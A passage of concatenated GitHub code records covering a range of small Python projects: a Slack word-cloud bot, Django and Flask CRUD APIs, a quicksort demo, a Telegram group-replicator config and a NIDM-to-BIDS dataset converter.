df_log.groupby(df_log.index.time).mean()\nplt.plot(csv_mean['IO'], label = 'IO 
results')\nplt.grid()\n\nprint(' ----- controlling results ----- \\n')\nprint('Cost forecast control: {}'.format(sum(df_c['kpi forecast'])))\nprint('Cost two-point control: {}'.format(sum(df_c['kpi standard'])))\n\nc = df_log['IO'].get_values()\nBI = (df_log['bi'].get_values()+1)/2\n\ne = 0\nfor i in range(len(BI)):\n e = e +((1-BI[i])*10 +20)*c[i]\nprint('\\n Total costs [Euro]= ',e*0.00833/100,'Euro')\n\n\n\n# Praediktionsfehler nach Tageszeit\n# plt.figure(4)\n# forecast_mean = df_f.groupby(df_f.index.time).mean()\n# plt.plot(forecast_mean['2h_median'])\n# plt.plot(forecast_mean['6h_median'])\n# plt.plot(forecast_mean['12h_median'])\n# plt.plot(forecast_mean['24h_median'])\n\n\nplt.show()","repo_name":"stfriedr/evaluation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22654116738","text":"print(\"Введите число3 возводимое в степень, и степень числа\")\na = float(input())\nn = int(input())\nresult = 1.0\n\nfor i in range(abs(n)):\n result *= a\n\nif n < 0:\n result = 1 / result\n\nprint(result)\n","repo_name":"Gogapain/Programming","sub_path":"Practice/11/Phyton/1111.py","file_name":"1111.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9312991799","text":"#CONFIGURAÇÕES_DE_CONEXÃO_TELEGRAM\napi_id = \"\"\napi_hash = \"\"\nsessao = \"Enviar Mensagem\" #NÃO MEXER\n\n#CONFIGURAÇÕES AFILIADO\nlink_afiliado = \"\"\n\n#ID_DOS_GRUPOS_ORIGEM (NÃO MEXER)\nMINES_ID_ORIGEM = -1001939194214\nSPACEMAN_ID_ORIGEM = -1001681284432\nFORTUNE_TIGER_ID_ORIGEM = -1001925549581\nPENALTY_SHOOT_UP_ID_ORIGEM = -1001938509759\nAVIATOR_ID_ORIGEM = -1001592219591\nBAC_BO_ID_ORIGEM = -1001931780675\n\n#ID_DOS_GRUPOS_DESTINO (MEXER)\nMINES_ID_DESTINO = -000\nSPACEMAN_ID_DESTINO = -000\nFORTUNE_TIGER_ID_DESTINO = -000\nPENALTY_SHOOT_UP_ID_DESTINO = -000\nAVIATOR_ID_DESTINO = -000\nBAC_BO_ID_DESTINO = -0000\n\n#PREFERENCIAS_DOS_GRUPOS (True = LIGADO, False = DESLIGADO)\nMINES_PREFERENCE = False\nSPACEMAN_PREFERENCE = False\nFORTUNE_TIGER_PREFERENCE = False\nPENALTY_SHOOT_UP_PREFERENCE = False\nAVIATOR_PREFERENCE = False","repo_name":"WillDevAC/sim-replicador","sub_path":"configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36627485834","text":"import re\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport config\nfrom PIL import Image\nfrom wordcloud import STOPWORDS, ImageColorGenerator, WordCloud\nfrom slackclient import SlackClient\n\nstopWords = config.stopWords\n\nclass wordCloudPlugin:\n\n def __init__(self):\n self.keywords = [\"!cloud\", \"!wordcloud\"]\n self.client = SlackClient(config.admin_token)\n\n def execute(self, event):\n\n channel = event.get('channel')\n rawMessages = self.client.api_call(\"channels.history\", channel=channel)\n \n if not rawMessages[\"ok\"]:\n self.client.api_call(\"chat.postMessage\", thread_ts=event['ts'], channel=channel, text=\"Error forming the word cloud :(\")\n return\n\n text = \"\"\n for messageObj in rawMessages[\"messages\"]:\n text += \" \" + messageObj[\"text\"].strip()\n\n while rawMessages[\"has_more\"]:\n rawMessages = self.client.api_call(\"channels.history\", channel=channel, \n count=1000, latest=rawMessages[\"messages\"][-1][\"ts\"])\n 
for messageObj in rawMessages[\"messages\"]:\n text += \" \" + messageObj[\"text\"].strip()\n\n text = text.lower()\n text = \" \".join([word for word in text.split() if word not in stopWords])\n text = re.sub(r\"\\s+\", ' ', text)\n text = re.sub('<[^>]+>', '', text)\n text = re.sub(r\"[^a-z .]\", '', text) #remove all characters that aren't letters, spaces, or periods\n \n if text:\n\n wordcloud = WordCloud(width=1600, height=800).generate(text)\n filepath = 'plugins/wordClouds/word_cloud_' + channel + '.png'\n\n plt.figure( figsize=(20,10), facecolor='k')\n plt.imshow(wordcloud)\n plt.axis(\"off\")\n plt.tight_layout(pad=0)\n plt.savefig(filepath, facecolor='k', bbox_inches='tight')\n\n # wordcloud.to_file(filepath)\n file = open(filepath, 'rb')\n self.client.api_call(\"files.upload\", channels=channel,\n file=file,\n initial_comment=\"WordCloud Generated!\") ","repo_name":"Avishek-Paul/SlackAssistant","sub_path":"plugins/wordCloudPlugin.py","file_name":"wordCloudPlugin.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34701158134","text":"import logging\n\nfrom nextcloud_news_updater.config import Config\n\n\nclass Logger:\n def __init__(self, config: Config) -> None:\n log_format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n logging.basicConfig(format=log_format)\n self.logger = logging.getLogger('Nextcloud News Updater')\n if config.loglevel == 'info':\n self.logger.setLevel(logging.INFO)\n else:\n self.logger.setLevel(logging.ERROR)\n\n def info(self, message: str) -> None:\n self.logger.info(message)\n\n def error(self, message: str) -> None:\n self.logger.error(message)\n","repo_name":"nextcloud/news-updater","sub_path":"nextcloud_news_updater/common/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":106,"dataset":"github-code","pt":"78"} +{"seq_id":"72618123772","text":"from rest_framework import viewsets\nfrom rest_framework import serializers\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom .serializers import OfferListSerializer\nfrom .models import OfferListModel\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.decorators import api_view, permission_classes\n\ndef get_object(pk):\n try:\n return OfferListModel.objects.get(pk=pk)\n except:\n return None\n\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef get(request):\n if request.query_params:\n items = OfferListModel.objects.filter(**request.query_params.dict())\n else:\n items = OfferListModel.objects.all()\n\n if items:\n serializer = OfferListSerializer(items, many=True)\n return Response(serializer.data)\n else:\n return Response(status=status.HTTP_404_NOT_FOUND, data={'error': \"page not found\"})\n\n\n@api_view(['POST'])\ndef create(request):\n item = OfferListSerializer(data=request.data)\n if item.is_valid():\n item.save()\n return Response(item.data)\n else:\n return Response(status=status.HTTP_404_NOT_FOUND, data={'error': item.errors})\n\n\n@api_view(['GET'])\ndef read(request, pk):\n item = get_object(pk=pk)\n if item:\n data = OfferListSerializer(item)\n if data:\n return Response(data.data)\n\n return Response(status=status.HTTP_404_NOT_FOUND, data={'error': \"page not found\"})\n\n\n@api_view(['PUT'])\ndef update(request, pk):\n item = get_object(pk=pk)\n data = 
OfferListSerializer(instance=item, data=request.data)\n\n if data.is_valid():\n data.save()\n return Response(data.data)\n else:\n return Response(status=status.HTTP_404_NOT_FOUND, data={'error': data.errors})\n\n\n@api_view(['GET', 'DELETE'])\ndef delete(request, pk):\n item = get_object(pk=pk)\n if item:\n item.delete()\n return Response(status=status.HTTP_202_ACCEPTED, data={'status': \"successful deleted\"})\n","repo_name":"tatsuhidehirakawa/django-postgresql-example","sub_path":"s_01_src/124dja_src/contracts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71978045373","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index),\n path('back', views.back, name=\"back\"),\n path('log_in', views.log_in_page_render, name=\"log_in\"),\n path('home_page', views.home_page_render, name=\"home_page\"),\n path('register_page', views.register_page_render, name=\"register_page\"),\n path('user_profile_page/', views.user_profile_page, name=\"user_profile\"),\n path('add_entry_page', views.add_entry_page, name=\"add_entry_page\"),\n path('deities_by_religion/', views.deities_by_religion_page, name=\"deities_by_religion\"),\n path('deities_by_location/', views.deities_by_location_page, name=\"deities_by_religion\"),\n path('deity_info_page/', views.deity_info_page, name=\"deity_info\"),\n path('register', views.register, name=\"register\"),\n path('logout', views.logout, name=\"logout\"),\n path('login', views.login, name=\"login\"),\n path('searchbar', views.searchbar, name=\"searchbar\"),\n path('add_deity', views.add_deity, name=\"add_deity\"),\n path('deity_edit_page/', views.deity_edit_page, name=\"deity_edit_page\"),\n path('edit_deity/', views.edit_deity, name=\"edit_deity\"),\n path('genCSV', views.generateCSV, name=\"genCSV\"),\n path('wiki_sum/', views.wiki_sum_page, name=\"wiki_sum\"),\n path('wiki_error', views.wiki_error, name=\"wiki_error\")\n]","repo_name":"JpBongiovanni/WDD2","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16441838939","text":"import genslides.utils.reqhelper as ReqHelper\nimport genslides.utils.request as Requester\n\nfrom genslides.commands.create import CreateCommand\nfrom genslides.helpers.singleton import Singleton\n\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\n\nimport json\n\nfrom genslides.utils.largetext import SimpleChatGPT\n\nclass TaskManager(metaclass=Singleton):\n def __init__(self) -> None:\n self.task_id = 0\n self.task_list = []\n self.model_list = []\n chat = SimpleChatGPT()\n self.model_list = chat.getModelNames()\n\n def getId(self, task) -> int:\n id = self.task_id\n self.task_id += 1\n if task not in self.task_list:\n self.task_list.append(task)\n return id\n \n def getPath(self) -> str:\n if not os.path.exists(\"saved\"):\n os.makedirs(\"saved\")\n return \"saved/\"\n \n def getLinks(self):\n mypath = self.getPath()\n onlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]\n out = []\n for filename in onlyfiles:\n path = join(mypath,filename)\n try:\n with open(path, 'r') as f:\n rq = json.load(f)\n if 'linked' in rq:\n\n pair = {}\n pair['name'] = filename.split('.')[0]\n pair['linked'] = rq['linked']\n out.append(pair)\n except Exception as e:\n pass\n return out\n\n \n def 
getParentTaskPrompts(self):\n mypath = self.getPath()\n onlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]\n out = []\n for filename in onlyfiles:\n path = join(mypath,filename)\n try:\n with open(path, 'r') as f:\n rq = json.load(f)\n if 'parent' in rq:\n print(path)\n parent_path = rq['parent']\n if parent_path == \"\" and 'chat' in rq and 'type' in rq:\n print(path)\n \n for elem in rq['chat']:\n if elem['role'] == 'user':\n pair = {\n 'type' : rq['type'],\n 'content' : elem['content']\n }\n out.append(pair)\n except Exception as e:\n pass\n return out\n\n def getTaskPrompts(self, trg_path = \"\"):\n mypath = self.getPath()\n onlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]\n out = []\n for filename in onlyfiles:\n path = join(mypath,filename)\n try:\n with open(path, 'r') as f:\n rq = json.load(f)\n if 'parent' in rq:\n # print(path):w\n\n parent_path = rq['parent']\n if parent_path == trg_path and 'chat' in rq and 'type' in rq:\n print(\"Get propmt from=\",path)\n # if rq['type'].endswith(\"RichText\") or rq['type'].endswith(\"Response\"):\n if len(rq['chat']) == 0:\n elem = {'role': 'user','content': ''}\n else:\n if rq['type'] == \"RichText\":\n elem = rq['chat'].pop()\n elem = rq['chat'].pop()\n pair = {}\n # pair['type'] = rq['type']\n pair['type'] =filename.split('.')[0] \n pair['content'] = elem['content']\n pair['role'] = elem['role']\n\n out.append(pair)\n \n # for elem in rq['chat']:\n # if elem['role'] == 'user':\n # pair = {}\n # pair['type'] = rq['type']\n # pair['content'] = elem['content']\n # out.append(pair)\n except Exception as e:\n print(\"error=\", type(e))\n return out\n\n\n\n\nclass TaskDescription():\n def __init__(self, prompt = \"\", method = None, parent=None, helper=None, requester=None, target=None, id = 0, type = \"\", prompt_tag = \"user\", filename = \"\", enabled = False, params = [], manual = False) -> None:\n self.prompt = prompt\n self.prompt_tag = prompt_tag\n self.method = method\n self.parent = parent\n self.helper = helper\n self.requester = requester\n self.target = target\n self.id = id\n self.type = type\n self.filename = filename\n self.enabled = enabled\n self.params = params\n self.manual = manual\n\nclass BaseTask():\n def __init__(self, task_info : TaskDescription, type = 'None') -> None:\n self.childs = []\n self.is_solved = False\n self.reqhelper = task_info.helper\n self.requester = task_info.requester\n self.crtasklist = []\n\n type = task_info.type\n self.type = type\n self.init = self.reqhelper.getInit(type)\n self.endi = self.reqhelper.getEndi(type)\n\n self.prompt = task_info.prompt\n self.prompt_tag = task_info.prompt_tag\n \n self.method = task_info.method\n task_manager = TaskManager()\n self.id = task_manager.getId(self)\n request = self.init + self.prompt + self.endi\n self.task_description = \"Task type = \" + self.type + \"\\nRequest:\\n\" + request\n self.task_creation_result = \"Results of task creation:\\n\"\n\n self.parent = task_info.parent\n self.is_freeze = False\n if self.parent:\n self.parent.addChild(self)\n if self.parent.is_freeze:\n self.is_freeze = True\n self.target = task_info.target\n self.filename = task_info.filename\n\n self.affect_to_ext_list = []\n self.by_ext_affected_list = []\n self.name = self.type + str(self.id)\n \n \n def freezeTask(self):\n self.is_freeze = True\n # self.update()\n\n def unfreezeTask(self):\n self.is_freeze = False\n # self.update()\n\n def getRichPrompt(self) -> str:\n out = self.prompt\n if not out.startswith(self.init):\n out = self.init + 
out\n if not out.endswith(self.endi):\n out += self.endi\n for task in self.by_ext_affected_list:\n out += \" \" + task.prompt\n return out\n \n def getJson(self):\n return None\n \n\n def getIdStr(self) -> str:\n return str(self.id)\n \n def getName(self) -> str:\n return self.name\n\n def getAncestorByName(self, trg_name):\n index = 0\n task = self\n while(index < 1000):\n if task.parent != None:\n if task.parent.getName() != trg_name:\n task = task.parent\n else:\n return task.parent\n else:\n break\n index += 1\n return None\n\n def getNewID(self) -> int:\n task_manager = TaskManager()\n self.id = task_manager.getId(self)\n return self.id\n\n\n def addChildToCrList(self, task : TaskDescription):\n self.crtasklist.append(task)\n\n def isSolved(self):\n return self.is_solved\n \n def checkChilds(self):\n for child in self.childs:\n if not child.isSolved():\n return False\n return True\n\n def addChild(self, child):\n if child not in self.childs:\n self.childs.append(child)\n\n def getCmd(self):\n if len(self.crtasklist) > 0:\n task = self.crtasklist.pop()\n print('Register command:' + str(task.method))\n return CreateCommand( task)\n return None\n \n def stdProcessUnFreeze(self, input=None):\n if self.parent:\n self.is_freeze = self.parent.is_freeze\n else:\n pass\n\n def updateIternal(self, input : TaskDescription = None):\n pass\n \n def update(self, input : TaskDescription = None):\n self.stdProcessUnFreeze(input)\n\n if input:\n if input.parent:\n self.parent = input.parent\n self.parent.addChild(self)\n print(\"New parent=\", self.parent)\n \n print(\"Update=\",self.getName(), \"|frozen=\", self.is_freeze, \"||\")\n self.updateIternal(input)\n\n for child in self.childs:\n child.update()\n\n\n self.useLinksToTask()\n\n # if not self.is_freeze:\n\n return \"\",\"\",\"\"\n \n def getMsgInfo(self):\n return \"\",\"\",\"\"\n \n def getInfo(self, short = True) -> str:\n return \"Some description\"\n\n\n def beforeRemove(self):\n if self.parent:\n self.parent.childs.remove(self)\n for child in self.childs:\n child.whenParentRemoved()\n\n def whenParentRemoved(self):\n self.parent = None\n\n def removeParent(self):\n if self.parent:\n self.parent.childs.remove(self)\n self.parent = None\n \n\n def getCountPrice(self):\n return 0,0\n \n def affectedTaskCallback(self, input : TaskDescription):\n pass\n\n def createLinkToTask(self, task) -> TaskDescription:\n pass\n # id = len(self.by_ext_affected_list)\n # out = TaskDescription(method=self.affectedTaskCallback, id=id, parent=task )\n # self.by_ext_affected_list.append(out)\n # task.setLinkToTask(out)\n # return out\n \n def removeLinkToTask(self):\n while len(self.by_ext_affected_list) > 0:\n input = self.by_ext_affected_list.pop()\n input.parent.resetLinkToTask(input)\n \n \n def setLinkToTask(self, info : TaskDescription) -> None:\n self.affect_to_ext_list.append(info)\n\n def resetLinkToTask(self, info : TaskDescription) -> None:\n self.affect_to_ext_list.remove(info)\n\n def useLinksToTask(self):\n input = TaskDescription(prompt=self.prompt)\n for task in self.affect_to_ext_list:\n input.id = task.id\n task.method(input)\n\n def completeTask(self) -> bool:\n # print(self.getName(),\"=Complete Task\")\n return False \n \n def getParam(self, param_name):\n return None\n ","repo_name":"artemopolus/genslides","sub_path":"genslides/task/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":10463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31647542759","text":"from 
django.core.management.base import BaseCommand\nfrom core.management.commands.utils import get_random_values_from_list\nfrom users.models import Interest\n\n\nclass Command(BaseCommand):\n\n    FAKE_INTERESTS = [\n        ('sports', 'Sports'),\n        ('programming', 'Programming'),\n        ('party', 'Party'),\n        ('travel', 'Travel'),\n        ('hiking', 'Hiking'),\n        ('art', 'Art'),\n        ('football', 'Football'),\n        ('formula1', 'Formula 1')\n    ]\n\n    def handle(self, *args, **options):\n\n        for interest in self.FAKE_INTERESTS:\n            name, value = interest\n\n            Interest.objects.create(name=name, value=value)\n            self.stdout.write(self.style.SUCCESS('Imported interest: {}'.format(value)))\n        self.stdout.write(self.style.SUCCESS('Imported {} interests'.format(len(self.FAKE_INTERESTS))))\n","repo_name":"pr0grammr/mini-users-api","sub_path":"users/management/commands/createfakeinterests.py","file_name":"createfakeinterests.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2110890774","text":"import csv\nimport re\n\ndef read_firms(filePath):\n    with open(filePath, 'r') as f:\n        reader = csv.reader(f)\n        your_list = list(reader)\n    flatten = lambda l: [item for sublist in l for item in sublist]\n    firms = flatten(your_list)\n\n    pattern = re.compile(r\"\\w+\\b(? List[str]:\n        from functools import lru_cache\n        def _possible(s, words):\n            dp = [False] * (n+1)\n            dp[0] = True\n            for i in range(n+1):\n                for j in range(i-1, -1, -1):\n                    if dp[j] and s[j:i] in words:\n                        dp[i] = True\n                        break\n            return dp[n]\n\n        n = len(s)\n        ws = set(wordDict)\n        if not _possible(s, ws): return []\n        @lru_cache(None)\n        def helper(i):\n            res = []\n            if i == n:\n                res.append(\"\")\n            for j in range(i+1, n+1):\n                if s[i:j] in ws:\n                    back = helper(j)\n                    for e in back:\n                        cur = s[i:j] + \" \" + e if e != \"\" else s[i:j]\n                        res.append(cur)\n            return res\n        return helper(0)\n\nif __name__ == '__main__':\n    a = Solution()\n    a.wordBreak(s = \"catsanddog\", wordDict = [\"cat\", \"cats\", \"and\", \"sand\", \"dog\"])\n    a.wordBreak(s = \"pineapplepenapple\", wordDict = [\"apple\", \"pen\", \"applepen\", \"pine\", \"pineapple\"])\n    a.wordBreak(s = \"catsandog\", wordDict = [\"cats\", \"dog\", \"sand\", \"and\", \"cat\"])","repo_name":"Rivarrl/leetcode_python","sub_path":"leetcode/1-300/140.py","file_name":"140.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"7127348104","text":"#!/usr/bin/python3\n\"\"\"\nThis file contains the User module\n\"\"\"\nfrom api.v1.views import app_views\nfrom flask import jsonify, abort, request, make_response\nfrom models import storage\nfrom models.user import User\nfrom flasgger.utils import swag_from\n\n\n@app_views.route('/users', methods=['GET'], strict_slashes=False)\n@swag_from('documentation/user/get.yml', methods=['GET'])\ndef get_all_users():\n    \"\"\" get users by id\"\"\"\n    all_list = [obj.to_dict() for obj in storage.all(User).values()]\n    return jsonify(all_list)\n\n\n@app_views.route('/users/<user_id>', methods=['GET'],\n                 strict_slashes=False)\n@swag_from('documentation/user/get_id.yml', methods=['GET'])\ndef get_user(user_id):\n    \"\"\" get user by id\"\"\"\n    user = storage.get(User, user_id)\n    if user is None:\n        abort(404)\n    return jsonify(user.to_dict())\n\n\n@app_views.route('/users/<user_id>', methods=['DELETE'],\n                 strict_slashes=False)\n@swag_from('documentation/user/delete.yml', methods=['DELETE'])\ndef del_user(user_id):\n    \"\"\" delete user by id\"\"\"\n    user = 
storage.get(User, user_id)\n    if user is None:\n        abort(404)\n    user.delete()\n    storage.save()\n    return jsonify({})\n\n\n@app_views.route('/users/', methods=['POST'],\n                 strict_slashes=False)\n@swag_from('documentation/user/post.yml', methods=['POST'])\ndef create_obj_user():\n    \"\"\" create new instance \"\"\"\n    if not request.get_json():\n        return make_response(jsonify({\"error\": \"Not a JSON\"}), 400)\n    if 'email' not in request.get_json():\n        return make_response(jsonify({\"error\": \"Missing email\"}), 400)\n    if 'password' not in request.get_json():\n        return make_response(jsonify({\"error\": \"Missing password\"}), 400)\n    js = request.get_json()\n    obj = User(**js)\n    obj.save()\n    return (jsonify(obj.to_dict()), 201)\n\n\n@app_views.route('/users/<user_id>', methods=['PUT'],\n                 strict_slashes=False)\n@swag_from('documentation/user/put.yml', methods=['PUT'])\ndef post_user(user_id):\n    \"\"\" \"\"\"\n    if not request.get_json():\n        return make_response(jsonify({\"error\": \"Not a JSON\"}), 400)\n    obj = storage.get(User, user_id)\n    if obj is None:\n        abort(404)\n    for key, value in request.get_json().items():\n        if key not in ['id', 'email', 'created_at', 'updated_at']:\n            setattr(obj, key, value)\n    storage.save()\n    return jsonify(obj.to_dict())\n","repo_name":"AdeVickie/AirBnB_clone_v3","sub_path":"api/v1/views/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"7379228874","text":"# pivot을 기준으로 쪼갭니다\ndef zzogaeggi (list, low, high):\n\n    # pivot 값 정하기\n    pivot = list[high]\n\n    \n    # i는 피봇을 기준으로\n    # list를 정렬해주는 역할입니다.\n\n    i = low - 1\n    print(\"\")\n    print(\"pivot:\", pivot)\n\n    # j를 통해서 list를 훑습니다.\n    for j in range(low, high) :\n\n        if list[j] < pivot :\n\n            i = i + 1\n            # Swap\n            list[i], list[j] = list[j], list[i]\n            print(\"list:\", list)\n\n    # 마지막으로\n    #pivot이 들어갈 위치를 바꿔줍니다.\n    list[i+1], list[high] = list[high], list[i+1]\n    print(\"list_after_pivot:\", list)\n\n    return i +1\n    \n\n\ndef quickSort(list, low, high):\n\n    # pivot이 알맞은 위치에 있어서\n    # QuickSort를 실행해줘도 되는지 확인하는 부분\n\n    if low < high :\n\n        # pivot 기준으로 쪼개기 위해서, pivot 위치를 가져옵니다.\n        pivot_position = zzogaeggi(list, low, high)\n\n        #그리고 왼쪽과 오른쪽 부분을 쪼갭니다.\n        quickSort(list, low, pivot_position - 1)\n        quickSort(list, pivot_position + 1, high)\n\n\n\n# list를 쪼개는 과정은 merge sort처럼 O(log2(n))\n# 크기 비교하면서 정렬 O(n)\n# pivot이 계속 가장 큰 수/ 가장 작은수가 나올때\n# worst case가 존재 O(n^2)\n# 쪼개는 과정이 O(n)\n\nlist = [10, 80, 30, 90, 40, 50, 70]\nn = len(list)\nquickSort(list, 0, n-1)\nprint(list)\n","repo_name":"Tempnixk/DataStructure-Algorithm","sub_path":"Quick_Sort.py","file_name":"Quick_Sort.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17179224298","text":"try:\n    a = int(input())\n    check = a\n    temp = -1\n    count = 0\n    if a<0 or a>100:\n        raise ValueError(\"Invalid input\")\nexcept ValueError as e:\n    print(e)\nelse:\n    while check!=temp:\n        count += 1\n        a01 = a%10\n        a10 = a//10\n        temp = a01*10 + (a10 + a01)%10\n        a = temp\n    print(count)","repo_name":"parkbyungnam/Algorithm_study","sub_path":"baejoon/기초/1110.py","file_name":"1110.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"11455684402","text":"\n\nfrom nndct_shared.base import NNDCT_OP\n\n\nclass ReshapeMergeHandler(object):\n    def __init__(self):\n        self.visited = set()\n    \n    def __call__(self, *args, 
**kwargs):\n _, node_set = args\n reshape_0 = node_set[0]\n reshape_1 = node_set[1]\n\n if reshape_0 in self.visited or reshape_1 in self.visited:\n return \n \n self.visited.add(reshape_0)\n self.visited.add(reshape_1)\n \n uses = list(reshape_0.out_tensors[0].uses)\n for use in uses:\n if use.user.op.type == NNDCT_OP.RESHAPE:\n use.user.replace_input_at(use.offset, reshape_0.in_tensors[0])\n ","repo_name":"Xilinx/Vitis-AI","sub_path":"src/vai_quantizer/vai_q_pytorch/nndct_shared/optimization/merge_reshape.py","file_name":"merge_reshape.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":1266,"dataset":"github-code","pt":"78"} +{"seq_id":"23995329286","text":"\"\"\"\nThis program will convert a NIDM-Experiment RDF document to a BIDS dataset.\nThe program will query the NIDM-Experiment document for subjects, MRI scans,\nand associated assessments saving the MRI data to disk in an organization\naccording to the BIDS specification, the demographics metadata to a\nparticipants.tsv file, the project-level metadata to a dataset_description.json\nfile, and the assessments to *.tsv/*.json file pairs in a phenotypes directory.\n\"\"\"\n\nfrom argparse import ArgumentParser\nfrom io import StringIO\nimport json\nimport os\nfrom os import mkdir, system\nfrom os.path import basename, isdir, isfile, join, splitext\nfrom shutil import copyfile\nimport sys\nimport tempfile\nimport urllib.parse\nimport datalad.api as dl\nimport pandas as pd\nfrom rdflib import Graph, URIRef\nimport requests\nimport validators\nfrom nidm.core import BIDS_Constants, Constants\nfrom nidm.core.Constants import DD\nfrom nidm.experiment.Query import (\n GetParticipantIDFromAcquisition,\n GetProjectLocation,\n GetProjectsUUID,\n)\nfrom nidm.experiment.Utils import read_nidm, write_json_mapping_file\n\n\ndef GetImageFromAWS(location, output_file, args):\n \"\"\"\n This function will attempt to get a BIDS image identified by location from AWS S3. It only\n supports known URLs at this time (e.g. openneuro)\n :param location: path string to file. This can be a local path. Function will try and detect if this\n is a known project/archive and if so will format theh S3 string appropriately. Otherwise it will return None\n :param output_file: This is the full path and filename to store the S3 downloaded file if successful\n :return: None if file not downloaded else will return True\n \"\"\"\n\n print(f\"Trying AWS S3 for dataset: {location}\")\n # modify location to remove everything before the dataset name\n # problem is we don't know the dataset identifier inside the path string because\n # it doesn't have any constraints. 
For openneuro datasets they start with \"ds\" so\n # we could pick that out but for others it's difficult (impossible)?\n\n # case for openneuro\n if \"openneuro\" in location:\n # remove everything from location string before openneuro\n openneuro_loc = location[location.find(\"openneuro/\") + 10 :]\n # get a temporary directory for this file\n temp_dir = tempfile.mkdtemp()\n # aws command\n cmd = (\n \"aws s3 cp --no-sign-request \"\n + \"s3://openneuro.org/\"\n + openneuro_loc\n + \" \"\n + temp_dir\n )\n # execute command\n print(cmd)\n system(cmd)\n # check if aws command downloaded something\n if not isfile(join(temp_dir, basename(location))):\n print(\"Couldn't get dataset from AWS either...\")\n return None\n else:\n try:\n # copy file from temp_dir to bids dataset\n print(\"Copying temporary file to final location....\")\n copyfile(join(temp_dir, basename(location)), output_file)\n return True\n except Exception:\n print(\"Couldn't get dataset from AWS either...\")\n return None\n # if user supplied a URL base, add dataset, subject, and file information to it and try to download the image\n elif args.aws_baseurl:\n aws_baseurl = args.aws_baseurl\n # check if user supplied the last '/' in the aws_baseurl or not. If not, add it.\n if aws_baseurl[-1] != \"/\":\n aws_baseurl = aws_baseurl = \"/\"\n # remove everything from location string before openneuro\n loc = location[location.find(args.dataset_string) + len(args.dataset_string) :]\n # get a temporary directory for this file\n temp_dir = tempfile.mkdtemp()\n # aws command\n cmd = \"aws s3 cp --no-sign-request \" + aws_baseurl + loc + \" \" + temp_dir\n # execute command\n print(cmd)\n system(cmd)\n # check if aws command downloaded something\n if not isfile(join(temp_dir, basename(location))):\n print(\"Couldn't get dataset from AWS either...\")\n return None\n else:\n try:\n # copy file from temp_dir to bids dataset\n print(\"Copying temporary file to final location....\")\n copyfile(join(temp_dir, basename(location)), output_file)\n return True\n except Exception:\n print(\"Couldn't get dataset from AWS either...\")\n return None\n\n\ndef GetImageFromURL(url):\n \"\"\"\n This function will try and retrieve the file referenced by url\n :param url: url to file to download\n :return: temporary filename or -1 if fails\n \"\"\"\n\n # try to open the url and get the pointed to file\n try:\n # open url and get file\n with requests.get(url, stream=True) as r:\n r.raise_for_status()\n # write temporary file to disk and use for stats\n with tempfile.NamedTemporaryFile(delete=False) as temp:\n for chunk in r.iter_content(65535):\n temp.write(chunk)\n temp.flush()\n return temp.name\n except Exception:\n print(f\"ERROR! 
Can't open url: {url}\")\n return -1\n\n\ndef GetDataElementMetadata(nidm_graph, de_uuid):\n \"\"\"\n This function will query the nidm_graph for the DataElement de_uuid and return all the metadata as a BIDS-compliant\n participants sidecar file dictionary\n \"\"\"\n\n # query nidm_graph for Constants.NIIRI[de_uuid] rdf:type PersonalDataElement\n query = f\"\"\"\n PREFIX rdf: \n PREFIX prov: \n PREFIX niiri: \n PREFIX nidm: \n\n select distinct ?p ?o\n where {{\n\n <{Constants.NIIRI[de_uuid]}> rdf:type nidm:PersonalDataElement ;\n ?p ?o .\n }}\n \"\"\"\n\n # print(query)\n qres = nidm_graph.query(query)\n\n # set up a dictionary entry for this column\n # current_tuple = str(DD(source=\"participants.tsv\", variable=column))\n\n # temporary dictionary of metadata\n temp_dict = {}\n # add info to BIDS-formatted json sidecar file\n for row in qres:\n temp_dict[str(row[0])] = str(row[1])\n\n # set up a dictionary entry for this column\n current_tuple = str(\n DD(\n source=\"participants.tsv\",\n 